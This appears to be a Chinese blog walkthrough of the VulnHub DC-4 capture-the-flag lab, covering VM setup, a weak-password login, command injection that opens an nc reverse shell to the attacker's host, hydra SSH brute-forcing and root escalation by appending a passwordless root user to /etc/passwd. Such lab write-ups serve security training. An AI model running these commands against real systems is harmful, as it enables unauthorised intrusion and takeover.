# 前言
继续这个系列的第四篇,这篇很简单,上来就 rce 了,不过提权稍微有点套娃
# 环境搭建
地址:DC: 4 ~ VulnHub
使用 VMware 搭建环境(这个参考这个系列的第一篇即可 DC-1 - Vulnhub | Clown の Blog = (xcu.icu),环境搭建都一样,这里我还是将网络模式改为了 nat)
这里有两点值得注意的地方我还是写一下(如果存在的话)
# VMware Workstation 不可恢复错误:(vmui)
将硬件兼容性改为 16 即可
选择更改此虚拟机
加载完成就可以了
# IDE 设备 (磁盘 / CD-ROM) 配置不正确
解决方法也很简单,根据报错提示改一下就可以了点 “虚拟机”->“设置”-> 选择 “磁盘 / 光驱 IDE 设备 " -> 点 ” 高级 “
将这里改为 IDE 0::0 就可以了
# 打靶流程
首先还是进行主机发现
然后进行端口扫描
然后进行协议发现
这里可以看到开放了两个端口,22 端口是 OpenSSH 7.4 Debian,80 端口是 Nginx 1.15.10
这里先去看一下 80 端口上面的服务
这里开放了一个 web 页面,是一个登录的功能,这里先测试一下 sql
发现这里应该是没有 sql 注入,然后尝试一下弱口令,这里使用的是 john 的字典,位于 /usr/share/john/password.lst
这里可以看到使用 happy 能登录成功
这里可以看到,这里执行一些命令,还是抓包,这里直接去尝试反弹 shell
radio=nc 192.168.246.129 6699 -e /bin/bash&submit=Run |
本地起一个监听端口
这里当前的权限是 www-data,然后本来想要查看 sudo -l 配置信息,发现要密码,这里进到 home 目录
这里可以看到有三个用户,这里进入到 jim 目录
这个文件没有什么有用的信息,然后这里看一下 backups 目录下,这里有一个 old-passwords.bak,很显然这是一个密码的备份文件,这里尝试用这个密码登录这个 jim 用户
这里将这个密码复制出来到 kali 中
hydra -l jim -P ./password.txt ssh://192.168.246.149 |
这里可以看到密码就已经爆破出来了,然后登录这个密码
[22][ssh] host: 192.168.246.149 login: jim password: jibril04
这里尝试 ssh 连接,这里看到提示有 mail,然后这里找一下
find / -name "mail" |
这里看到有两个 mail,这里去看一下
这里看到是 charles 发给 jim,而且这里还给了密码,这里直接尝试去登录
这里可以看到这里存在一个 root 权限免密码执行 /usr/bin/teehee
这个命令是一个文件内容追加的作用,这里直接添加文件内容到 /etc/passwd
echo "clown::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令